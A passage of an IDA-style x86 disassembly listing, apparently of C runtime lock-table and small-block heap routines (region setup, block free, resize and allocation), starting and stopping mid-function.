jmp short loc_4058BB
sub_405881 endp
; =============== S U B R O U T I N E =======================================
sub_4058CA proc near ; CODE XREF: sub_405229:loc_405261�j
push ebx
mov ebx, ds:dword_41D170
push esi
mov esi, offset dword_423800
push edi
loc_4058D8: ; CODE XREF: sub_4058CA+30�j
mov edi, [esi]
test edi, edi
jz short loc_4058F1
cmp dword ptr [esi+4], 1
jz short loc_4058F1
push edi
call ebx
push edi
call sub_403603
and dword ptr [esi], 0
pop ecx
loc_4058F1: ; CODE XREF: sub_4058CA+12�j
; sub_4058CA+18�j
add esi, 8
cmp esi, offset dword_423920
jl short loc_4058D8
mov esi, offset dword_423800
pop edi
loc_405902: ; CODE XREF: sub_4058CA+50�j
mov eax, [esi]
test eax, eax
jz short loc_405911
cmp dword ptr [esi+4], 1
jnz short loc_405911
push eax
call ebx
loc_405911: ; CODE XREF: sub_4058CA+3C�j
; sub_4058CA+42�j
add esi, 8
cmp esi, offset dword_423920
jl short loc_405902
pop esi
pop ebx
retn
sub_4058CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40591F proc near ; CODE XREF: sub_402ADF+2�p
; sub_403659+2�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push ds:dword_423800[eax*8]
call ds:dword_41D16C
pop ebp
retn
sub_40591F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405934 proc near ; CODE XREF: sub_4059F7+14�p
; sub_4084A1+4F�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset dword_4214D8
call __SEH_prolog4
xor edi, edi
inc edi
mov [ebp+var_1C], edi
xor ebx, ebx
cmp ds:dword_425F68, ebx
jnz short loc_405968
call sub_409C54
push 1Eh
call sub_409AB4
push 0FFh
call sub_4078A7
pop ecx
pop ecx
loc_405968: ; CODE XREF: sub_405934+1A�j
mov esi, [ebp+arg_0]
lea esi, ds:423800h[esi*8]
cmp [esi], ebx
jz short loc_40597A
mov eax, edi
jmp short loc_4059E8
; ---------------------------------------------------------------------------
loc_40597A: ; CODE XREF: sub_405934+40�j
push 18h
call sub_40773A
pop ecx
mov edi, eax
cmp edi, ebx
jnz short loc_405997
call sub_4057D3
mov dword ptr [eax], 0Ch
xor eax, eax
jmp short loc_4059E8
; ---------------------------------------------------------------------------
loc_405997: ; CODE XREF: sub_405934+52�j
push 0Ah
call sub_4059F7
pop ecx
mov [ebp+ms_exc.disabled], ebx
cmp [esi], ebx
jnz short loc_4059D2
push 0FA0h
push edi
call sub_40CB14
pop ecx
pop ecx
test eax, eax
jnz short loc_4059CE
push edi
call sub_403603
pop ecx
call sub_4057D3
mov dword ptr [eax], 0Ch
mov [ebp+var_1C], ebx
jmp short loc_4059D9
; ---------------------------------------------------------------------------
loc_4059CE: ; CODE XREF: sub_405934+81�j
mov [esi], edi
jmp short loc_4059D9
; ---------------------------------------------------------------------------
loc_4059D2: ; CODE XREF: sub_405934+70�j
push edi
call sub_403603
pop ecx
loc_4059D9: ; CODE XREF: sub_405934+98�j
; sub_405934+9C�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_4059EE
mov eax, [ebp+var_1C]
loc_4059E8: ; CODE XREF: sub_405934+44�j
; sub_405934+61�j
call __SEH_epilog4
retn
sub_405934 endp
; =============== S U B R O U T I N E =======================================
sub_4059EE proc near ; CODE XREF: sub_405934+AC�p
; DATA XREF: J8@F_7_S:004214F0�o
push 0Ah
call sub_40591F
pop ecx
retn
sub_4059EE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4059F7 proc near ; CODE XREF: sub_402A45+44�p
; sub_403603+1E�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push esi
lea esi, ds:423800h[eax*8]
cmp dword ptr [esi], 0
jnz short loc_405A1D
push eax
call sub_405934
test eax, eax
pop ecx
jnz short loc_405A1D
push 11h
call sub_40785D
pop ecx
loc_405A1D: ; CODE XREF: sub_4059F7+11�j
; sub_4059F7+1C�j
push dword ptr [esi]
call ds:dword_41D168
pop esi
pop ebp
retn
sub_4059F7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405A28 proc near ; CODE XREF: sub_405A83:loc_405AA6�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push esi
lea eax, [ebp+var_4]
xor esi, esi
push eax
mov [ebp+var_4], esi
mov [ebp+var_8], esi
call sub_407906
test eax, eax
pop ecx
jz short loc_405A51
push esi
push esi
push esi
push esi
push esi
call sub_402E3D
add esp, 14h
loc_405A51: ; CODE XREF: sub_405A28+1A�j
lea eax, [ebp+var_8]
push eax
call sub_40793D
test eax, eax
pop ecx
jz short loc_405A6C
push esi
push esi
push esi
push esi
push esi
call sub_402E3D
add esp, 14h
loc_405A6C: ; CODE XREF: sub_405A28+35�j
cmp [ebp+var_4], 2
pop esi
jnz short loc_405A7E
cmp [ebp+var_8], 5
jb short loc_405A7E
xor eax, eax
inc eax
leave
retn
; ---------------------------------------------------------------------------
loc_405A7E: ; CODE XREF: sub_405A28+49�j
; sub_405A28+4F�j
push 3
pop eax
leave
retn
sub_405A28 endp
; =============== S U B R O U T I N E =======================================
sub_405A83 proc near ; CODE XREF: J8@F_7_S:00404009�p
arg_0 = dword ptr 4
xor eax, eax
cmp [esp+arg_0], eax
push 0
setz al
push 1000h
push eax
call ds:dword_41D160
test eax, eax
mov ds:dword_425F68, eax
jnz short loc_405AA6
loc_405AA3: ; CODE XREF: sub_405A83+54�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_405AA6: ; CODE XREF: sub_405A83+1E�j
call sub_405A28
cmp eax, 3
mov ds:dword_434DF4, eax
jnz short loc_405AD9
push 3F8h
call sub_405ADD
test eax, eax
pop ecx
jnz short loc_405AD9
push ds:dword_425F68
call ds:dword_41D164
and ds:dword_425F68, 0
jmp short loc_405AA3
; ---------------------------------------------------------------------------
loc_405AD9: ; CODE XREF: sub_405A83+30�j
; sub_405A83+3F�j
xor eax, eax
inc eax
retn
sub_405A83 endp
; =============== S U B R O U T I N E =======================================
sub_405ADD proc near ; CODE XREF: sub_405A83+37�p
arg_0 = dword ptr 4
push 140h
push 0
push ds:dword_425F68
call ds:dword_41D114
test eax, eax
mov ds:dword_434DE0, eax
jnz short loc_405AFA
retn
; ---------------------------------------------------------------------------
loc_405AFA: ; CODE XREF: sub_405ADD+1A�j
mov ecx, [esp+arg_0]
and ds:dword_425F6C, 0
and ds:dword_434DDC, 0
mov ds:dword_434DE8, eax
xor eax, eax
mov ds:dword_434DE4, ecx
mov ds:dword_434DEC, 10h
inc eax
retn
sub_405ADD endp
; =============== S U B R O U T I N E =======================================
sub_405B25 proc near ; CODE XREF: sub_402A45+4E�p
; sub_403603+29�p ...
arg_0 = dword ptr 4
mov ecx, ds:dword_434DDC
mov eax, ds:dword_434DE0
imul ecx, 14h
add ecx, eax
jmp short loc_405B49
; ---------------------------------------------------------------------------
loc_405B37: ; CODE XREF: sub_405B25+26�j
mov edx, [esp+arg_0]
sub edx, [eax+0Ch]
cmp edx, 100000h
jb short locret_405B4F
add eax, 14h
loc_405B49: ; CODE XREF: sub_405B25+10�j
cmp eax, ecx
jb short loc_405B37
xor eax, eax
locret_405B4F: ; CODE XREF: sub_405B25+1F�j
retn
sub_405B25 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405B50 proc near ; CODE XREF: sub_403603+38�p
; sub_40DA6D+B5�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov ecx, [ebp+arg_0]
mov eax, [ecx+10h]
push esi
mov esi, [ebp+arg_4]
push edi
mov edi, esi
sub edi, [ecx+0Ch]
add esi, 0FFFFFFFCh
shr edi, 0Fh
mov ecx, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_10], ecx
mov ecx, [esi]
dec ecx
test cl, 1
mov [ebp+var_4], ecx
jnz loc_405E60
push ebx
lea ebx, [ecx+esi]
mov edx, [ebx]
mov [ebp+var_C], edx
mov edx, [esi-4]
mov [ebp+var_8], edx
mov edx, [ebp+var_C]
test dl, 1
mov [ebp+arg_4], ebx
jnz short loc_405C1B
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_405BB3
push 3Fh
pop edx
loc_405BB3: ; CODE XREF: sub_405B50+5E�j
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_405BFD
cmp edx, 20h
mov ebx, 80000000h
jnb short loc_405BDE
mov ecx, edx
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_405BFA
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_405BFA
; ---------------------------------------------------------------------------
loc_405BDE: ; CODE XREF: sub_405B50+73�j
lea ecx, [edx-20h]
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_405BFA
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_405BFA: ; CODE XREF: sub_405B50+85�j
; sub_405B50+8C�j ...
mov ebx, [ebp+arg_4]
loc_405BFD: ; CODE XREF: sub_405B50+69�j
mov edx, [ebx+8]
mov ebx, [ebx+4]
mov ecx, [ebp+var_4]
add ecx, [ebp+var_C]
mov [edx+4], ebx
mov edx, [ebp+arg_4]
mov ebx, [edx+4]
mov edx, [edx+8]
mov [ebx+8], edx
mov [ebp+var_4], ecx
loc_405C1B: ; CODE XREF: sub_405B50+55�j
mov edx, ecx
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_405C29
push 3Fh
pop edx
loc_405C29: ; CODE XREF: sub_405B50+D4�j
mov ebx, [ebp+var_8]
and ebx, 1
mov [ebp+var_C], ebx
jnz loc_405CC7
sub esi, [ebp+var_8]
mov ebx, [ebp+var_8]
sar ebx, 4
push 3Fh
mov [ebp+arg_4], esi
dec ebx
pop esi
cmp ebx, esi
jbe short loc_405C4E
mov ebx, esi
loc_405C4E: ; CODE XREF: sub_405B50+FA�j
add ecx, [ebp+var_8]
mov edx, ecx
sar edx, 4
dec edx
cmp edx, esi
mov [ebp+var_4], ecx
jbe short loc_405C60
mov edx, esi
loc_405C60: ; CODE XREF: sub_405B50+10C�j
cmp ebx, edx
jz short loc_405CC2
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
cmp esi, [ecx+8]
jnz short loc_405CAA
cmp ebx, 20h
mov esi, 80000000h
jnb short loc_405C90
mov ecx, ebx
shr esi, cl
not esi
and [eax+edi*4+44h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_405CAA
mov ecx, [ebp+arg_0]
and [ecx], esi
jmp short loc_405CAA
; ---------------------------------------------------------------------------
loc_405C90: ; CODE XREF: sub_405B50+127�j
lea ecx, [ebx-20h]
shr esi, cl
not esi
and [eax+edi*4+0C4h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_405CAA
mov ecx, [ebp+arg_0]
and [ecx+4], esi
loc_405CAA: ; CODE XREF: sub_405B50+11D�j
; sub_405B50+137�j ...
mov ecx, [ebp+arg_4]
mov esi, [ecx+8]
mov ecx, [ecx+4]
mov [esi+4], ecx
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
mov ecx, [ecx+8]
mov [esi+8], ecx
loc_405CC2: ; CODE XREF: sub_405B50+112�j
mov esi, [ebp+arg_4]
jmp short loc_405CCA
; ---------------------------------------------------------------------------
loc_405CC7: ; CODE XREF: sub_405B50+E2�j
mov ebx, [ebp+arg_0]
loc_405CCA: ; CODE XREF: sub_405B50+175�j
cmp [ebp+var_C], 0
jnz short loc_405CD8
cmp ebx, edx
jz loc_405D58
loc_405CD8: ; CODE XREF: sub_405B50+17E�j
mov ecx, [ebp+var_10]
lea ecx, [ecx+edx*8]
mov ebx, [ecx+4]
mov [esi+8], ecx
mov [esi+4], ebx
mov [ecx+4], esi
mov ecx, [esi+4]
mov [ecx+8], esi
mov ecx, [esi+4]
cmp ecx, [esi+8]
jnz short loc_405D58
mov cl, [edx+eax+4]
mov byte ptr [ebp+arg_4+3], cl
inc cl
cmp edx, 20h
mov [edx+eax+4], cl
jnb short loc_405D2F
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_405D1E
mov ecx, edx
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_405D1E: ; CODE XREF: sub_405B50+1BE�j
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
lea eax, [eax+edi*4+44h]
or [eax], ebx
jmp short loc_405D58
; ---------------------------------------------------------------------------
loc_405D2F: ; CODE XREF: sub_405B50+1B8�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_405D45
lea ecx, [edx-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_405D45: ; CODE XREF: sub_405B50+1E3�j
lea ecx, [edx-20h]
mov edx, 80000000h
shr edx, cl
lea eax, [eax+edi*4+0C4h]
or [eax], edx
loc_405D58: ; CODE XREF: sub_405B50+182�j
; sub_405B50+1A6�j ...
mov eax, [ebp+var_4]
mov [esi], eax
mov [eax+esi-4], eax
mov eax, [ebp+var_10]
dec dword ptr [eax]
jnz loc_405E5F
mov eax, ds:dword_425F6C
test eax, eax
jz loc_405E51
mov ecx, ds:dword_434DF0
mov esi, ds:dword_41D15C
push 4000h
shl ecx, 0Fh
add ecx, [eax+0Ch]
mov ebx, 8000h
push ebx
push ecx
call esi
mov ecx, ds:dword_434DF0
mov eax, ds:dword_425F6C
mov edx, 80000000h
shr edx, cl
or [eax+8], edx
mov eax, ds:dword_425F6C
mov eax, [eax+10h]
mov ecx, ds:dword_434DF0
and dword ptr [eax+ecx*4+0C4h], 0
mov eax, ds:dword_425F6C
mov eax, [eax+10h]
dec byte ptr [eax+43h]
mov eax, ds:dword_425F6C
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_405DE6
and dword ptr [eax+4], 0FFFFFFFEh
mov eax, ds:dword_425F6C
loc_405DE6: ; CODE XREF: sub_405B50+28B�j
cmp dword ptr [eax+8], 0FFFFFFFFh
jnz short loc_405E51
push ebx
push 0
push dword ptr [eax+0Ch]
call esi
mov eax, ds:dword_425F6C
push dword ptr [eax+10h]
push 0
push ds:dword_425F68
call ds:dword_41D10C
mov ecx, ds:dword_434DDC
mov eax, ds:dword_425F6C
imul ecx, 14h
mov edx, ds:dword_434DE0
sub ecx, eax
lea ecx, [ecx+edx-14h]
push ecx
lea ecx, [eax+14h]
push ecx
push eax
call sub_407370
mov eax, [ebp+arg_0]
add esp, 0Ch
dec ds:dword_434DDC
cmp eax, ds:dword_425F6C
jbe short loc_405E47
sub [ebp+arg_0], 14h
loc_405E47: ; CODE XREF: sub_405B50+2F1�j
mov eax, ds:dword_434DE0
mov ds:dword_434DE8, eax
loc_405E51: ; CODE XREF: sub_405B50+223�j
; sub_405B50+29A�j
mov eax, [ebp+arg_0]
mov ds:dword_425F6C, eax
mov ds:dword_434DF0, edi
loc_405E5F: ; CODE XREF: sub_405B50+216�j
pop ebx
loc_405E60: ; CODE XREF: sub_405B50+37�j
pop edi
pop esi
leave
retn
sub_405B50 endp
; =============== S U B R O U T I N E =======================================
sub_405E64 proc near ; CODE XREF: sub_4062F9+C0�p
mov eax, ds:dword_434DEC
push esi
mov esi, ds:dword_434DDC
push edi
xor edi, edi
cmp esi, eax
jnz short loc_405EAB
add eax, 10h
imul eax, 14h
push eax
push ds:dword_434DE0
push edi
push ds:dword_425F68
call ds:dword_41D154
cmp eax, edi
jnz short loc_405E99
loc_405E95: ; CODE XREF: sub_405E64+68�j
; sub_405E64+94�j
xor eax, eax
jmp short loc_405F11
; ---------------------------------------------------------------------------
loc_405E99: ; CODE XREF: sub_405E64+2F�j
add ds:dword_434DEC, 10h
mov esi, ds:dword_434DDC
mov ds:dword_434DE0, eax
loc_405EAB: ; CODE XREF: sub_405E64+11�j
imul esi, 14h
add esi, ds:dword_434DE0
push 41C4h
push 8
push ds:dword_425F68
call ds:dword_41D114
cmp eax, edi
mov [esi+10h], eax
jz short loc_405E95
push 4
push 2000h
push 100000h
push edi
call ds:dword_41D158
cmp eax, edi
mov [esi+0Ch], eax
jnz short loc_405EFA
push dword ptr [esi+10h]
push edi
push ds:dword_425F68
call ds:dword_41D10C
jmp short loc_405E95
; ---------------------------------------------------------------------------
loc_405EFA: ; CODE XREF: sub_405E64+82�j
or dword ptr [esi+8], 0FFFFFFFFh
mov [esi], edi
mov [esi+4], edi
inc ds:dword_434DDC
mov eax, [esi+10h]
or dword ptr [eax], 0FFFFFFFFh
mov eax, esi
loc_405F11: ; CODE XREF: sub_405E64+33�j
pop edi
pop esi
retn
sub_405E64 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405F14 proc near ; CODE XREF: sub_4062F9+D6�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov ecx, [ebp+arg_0]
mov eax, [ecx+8]
push ebx
push esi
mov esi, [ecx+10h]
push edi
xor ebx, ebx
jmp short loc_405F2C
; ---------------------------------------------------------------------------
loc_405F29: ; CODE XREF: sub_405F14+1A�j
add eax, eax
inc ebx
loc_405F2C: ; CODE XREF: sub_405F14+13�j
test eax, eax
jge short loc_405F29
mov eax, ebx
imul eax, 204h
lea eax, [eax+esi+144h]
push 3Fh
mov [ebp+var_8], eax
pop edx
loc_405F45: ; CODE XREF: sub_405F14+3B�j
mov [eax+8], eax
mov [eax+4], eax
add eax, 8
dec edx
jnz short loc_405F45
push 4
mov edi, ebx
push 1000h
shl edi, 0Fh
add edi, [ecx+0Ch]
push 8000h
push edi
call ds:dword_41D158
test eax, eax
jnz short loc_405F78
or eax, 0FFFFFFFFh
jmp loc_406015
; ---------------------------------------------------------------------------
loc_405F78: ; CODE XREF: sub_405F14+5A�j
lea edx, [edi+7000h]
cmp edi, edx
mov [ebp+var_4], edx
ja short loc_405FC8
mov ecx, edx
sub ecx, edi
shr ecx, 0Ch
lea eax, [edi+10h]
inc ecx
loc_405F90: ; CODE XREF: sub_405F14+AF�j
or dword ptr [eax-8], 0FFFFFFFFh
or dword ptr [eax+0FECh], 0FFFFFFFFh
lea edx, [eax+0FFCh]
mov [eax], edx
lea edx, [eax-1004h]
mov dword ptr [eax-4], 0FF0h
mov [eax+4], edx
mov dword ptr [eax+0FE8h], 0FF0h
add eax, 1000h
dec ecx
jnz short loc_405F90
mov edx, [ebp+var_4]
loc_405FC8: ; CODE XREF: sub_405F14+6F�j
mov eax, [ebp+var_8]
add eax, 1F8h
lea ecx, [edi+0Ch]
mov [eax+4], ecx
mov [ecx+8], eax
lea ecx, [edx+0Ch]
mov [eax+8], ecx
mov [ecx+4], eax
and dword ptr [esi+ebx*4+44h], 0
xor edi, edi
inc edi
mov [esi+ebx*4+0C4h], edi
mov al, [esi+43h]
mov cl, al
inc cl
test al, al
mov eax, [ebp+arg_0]
mov [esi+43h], cl
jnz short loc_406005
or [eax+4], edi
loc_406005: ; CODE XREF: sub_405F14+EC�j
mov edx, 80000000h
mov ecx, ebx
shr edx, cl
not edx
and [eax+8], edx
mov eax, ebx
loc_406015: ; CODE XREF: sub_405F14+5F�j
pop edi
pop esi
pop ebx
leave
retn
sub_405F14 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40601A proc near ; CODE XREF: sub_40DA6D+77�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov ecx, [ebp+arg_0]
mov eax, [ecx+10h]
push ebx
push esi
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_4]
mov edx, edi
sub edx, [ecx+0Ch]
add esi, 17h
shr edx, 0Fh
mov ecx, edx
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [edi-4]
and esi, 0FFFFFFF0h
dec ecx
cmp esi, ecx
lea edi, [ecx+edi-4]
mov ebx, [edi]
mov [ebp+arg_8], ecx
mov [ebp+var_4], ebx
jle loc_4061BC
test bl, 1
jnz loc_4061B5
add ebx, ecx
cmp esi, ebx
jg loc_4061B5
mov ecx, [ebp+var_4]
sar ecx, 4
dec ecx
cmp ecx, 3Fh
mov [ebp+var_8], ecx
jbe short loc_40608F
push 3Fh
pop ecx
mov [ebp+var_8], ecx
loc_40608F: ; CODE XREF: sub_40601A+6D�j
mov ebx, [edi+4]
cmp ebx, [edi+8]
jnz short loc_4060DA
cmp ecx, 20h
mov ebx, 80000000h
jnb short loc_4060BB
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_4060DA
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_4060DA
; ---------------------------------------------------------------------------
loc_4060BB: ; CODE XREF: sub_40601A+85�j
add ecx, 0FFFFFFE0h
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_4060DA
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_4060DA: ; CODE XREF: sub_40601A+7B�j
; sub_40601A+98�j ...
mov ecx, [edi+8]
mov ebx, [edi+4]
mov [ecx+4], ebx
mov ecx, [edi+4]
mov edi, [edi+8]
mov [ecx+8], edi
mov ecx, [ebp+arg_8]
sub ecx, esi
add [ebp+var_4], ecx
cmp [ebp+var_4], 0
jle loc_4061A3
mov edi, [ebp+var_4]
mov ecx, [ebp+arg_4]
sar edi, 4
dec edi
cmp edi, 3Fh
lea ecx, [ecx+esi-4]
jbe short loc_406114
push 3Fh
pop edi
loc_406114: ; CODE XREF: sub_40601A+F5�j
mov ebx, [ebp+var_C]
lea ebx, [ebx+edi*8]
mov [ebp+arg_8], ebx
mov ebx, [ebx+4]
mov [ecx+4], ebx
mov ebx, [ebp+arg_8]
mov [ecx+8], ebx
mov [ebx+4], ecx
mov ebx, [ecx+4]
mov [ebx+8], ecx
mov ebx, [ecx+4]
cmp ebx, [ecx+8]
jnz short loc_406191
mov cl, [edi+eax+4]
mov byte ptr [ebp+arg_8+3], cl
inc cl
cmp edi, 20h
mov [edi+eax+4], cl
jnb short loc_406168
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_406160
mov ecx, edi
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_406160: ; CODE XREF: sub_40601A+136�j
lea eax, [eax+edx*4+44h]
mov ecx, edi
jmp short loc_406188
; ---------------------------------------------------------------------------
loc_406168: ; CODE XREF: sub_40601A+130�j
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_40617E
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_40617E: ; CODE XREF: sub_40601A+152�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [edi-20h]
loc_406188: ; CODE XREF: sub_40601A+14C�j
mov edx, 80000000h
shr edx, cl
or [eax], edx
loc_406191: ; CODE XREF: sub_40601A+11E�j
mov edx, [ebp+arg_4]
mov ecx, [ebp+var_4]
lea eax, [edx+esi-4]
mov [eax], ecx
mov [ecx+eax-4], ecx
jmp short loc_4061A6
; ---------------------------------------------------------------------------
loc_4061A3: ; CODE XREF: sub_40601A+DE�j
mov edx, [ebp+arg_4]
loc_4061A6: ; CODE XREF: sub_40601A+187�j
lea eax, [esi+1]
mov [edx-4], eax
mov [edx+esi-8], eax
jmp loc_4062F1
; ---------------------------------------------------------------------------
loc_4061B5: ; CODE XREF: sub_40601A+50�j
; sub_40601A+5A�j
xor eax, eax
jmp loc_4062F4
; ---------------------------------------------------------------------------
loc_4061BC: ; CODE XREF: sub_40601A+47�j
jge loc_4062F1
mov ebx, [ebp+arg_4]
sub [ebp+arg_8], esi
lea ecx, [esi+1]
mov [ebx-4], ecx
lea ebx, [ebx+esi-4]
mov esi, [ebp+arg_8]
sar esi, 4
dec esi
cmp esi, 3Fh
mov [ebp+arg_4], ebx
mov [ebx-4], ecx
jbe short loc_4061E7
push 3Fh
pop esi
loc_4061E7: ; CODE XREF: sub_40601A+1C8�j
test byte ptr [ebp+var_4], 1
jnz loc_406271
mov esi, [ebp+var_4]
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_406200
push 3Fh
pop esi
loc_406200: ; CODE XREF: sub_40601A+1E1�j
mov ecx, [edi+4]
cmp ecx, [edi+8]
jnz short loc_40624A
cmp esi, 20h
mov ebx, 80000000h
jnb short loc_40622B
mov ecx, esi
shr ebx, cl
lea esi, [esi+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [esi]
jnz short loc_406247
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_406247
; ---------------------------------------------------------------------------
loc_40622B: ; CODE XREF: sub_40601A+1F6�j
lea ecx, [esi-20h]
shr ebx, cl
lea ecx, [esi+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_406247
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_406247: ; CODE XREF: sub_40601A+208�j
; sub_40601A+20F�j ...
mov ebx, [ebp+arg_4]
loc_40624A: ; CODE XREF: sub_40601A+1EC�j
mov ecx, [edi+8]
mov esi, [edi+4]
mov [ecx+4], esi
mov esi, [edi+8]
mov ecx, [edi+4]
mov [ecx+8], esi
mov esi, [ebp+arg_8]
add esi, [ebp+var_4]
mov [ebp+arg_8], esi
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_406271
push 3Fh
pop esi
loc_406271: ; CODE XREF: sub_40601A+1D1�j
; sub_40601A+252�j
mov ecx, [ebp+var_C]
lea ecx, [ecx+esi*8]
mov edi, [ecx+4]
mov [ebx+8], ecx
mov [ebx+4], edi
mov [ecx+4], ebx
mov ecx, [ebx+4]
mov [ecx+8], ebx
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_4062E8
mov cl, [esi+eax+4]
mov byte ptr [ebp+arg_4+3], cl
inc cl
cmp esi, 20h
mov [esi+eax+4], cl
jnb short loc_4062BF
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_4062B7
mov ecx, esi
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx], edi
loc_4062B7: ; CODE XREF: sub_40601A+28D�j
lea eax, [eax+edx*4+44h]
mov ecx, esi
jmp short loc_4062DF
; ---------------------------------------------------------------------------
loc_4062BF: ; CODE XREF: sub_40601A+287�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_4062D5
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx+4], edi
loc_4062D5: ; CODE XREF: sub_40601A+2A9�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [esi-20h]
loc_4062DF: ; CODE XREF: sub_40601A+2A3�j
mov edx, 80000000h
shr edx, cl
or [eax], edx
loc_4062E8: ; CODE XREF: sub_40601A+275�j
mov eax, [ebp+arg_8]
mov [ebx], eax
mov [eax+ebx-4], eax
loc_4062F1: ; CODE XREF: sub_40601A+196�j
; sub_40601A:loc_4061BC�j
xor eax, eax
inc eax
loc_4062F4: ; CODE XREF: sub_40601A+19D�j
pop edi
pop esi
pop ebx
leave
retn
sub_40601A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4062F9 proc near ; CODE XREF: sub_403691+28�p
; sub_40D94F+88�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov eax, ds:dword_434DDC
mov ecx, [ebp+arg_0]
imul eax, 14h
add eax, ds:dword_434DE0
add ecx, 17h
and ecx, 0FFFFFFF0h
mov [ebp+var_10], ecx
sar ecx, 4
push ebx
dec ecx
cmp ecx, 20h
push esi
push edi
jge short loc_406330
or esi, 0FFFFFFFFh
shr esi, cl
or [ebp+var_8], 0FFFFFFFFh
jmp short loc_40633D
; ---------------------------------------------------------------------------
loc_406330: ; CODE XREF: sub_4062F9+2A�j
add ecx, 0FFFFFFE0h
or edx, 0FFFFFFFFh
xor esi, esi
shr edx, cl
mov [ebp+var_8], edx
loc_40633D: ; CODE XREF: sub_4062F9+35�j
mov ecx, ds:dword_434DE8
mov ebx, ecx
jmp short loc_406358
; ---------------------------------------------------------------------------
loc_406347: ; CODE XREF: sub_4062F9+64�j
mov edx, [ebx+4]
mov edi, [ebx]
and edx, [ebp+var_8]
and edi, esi
or edx, edi
jnz short loc_40635F
add ebx, 14h
loc_406358: ; CODE XREF: sub_4062F9+4C�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jb short loc_406347
loc_40635F: ; CODE XREF: sub_4062F9+5A�j
cmp ebx, eax
jnz short loc_4063E2
mov ebx, ds:dword_434DE0
jmp short loc_40637C
; ---------------------------------------------------------------------------
loc_40636B: ; CODE XREF: sub_4062F9+88�j
mov edx, [ebx+4]
mov edi, [ebx]
and edx, [ebp+var_8]
and edi, esi
or edx, edi
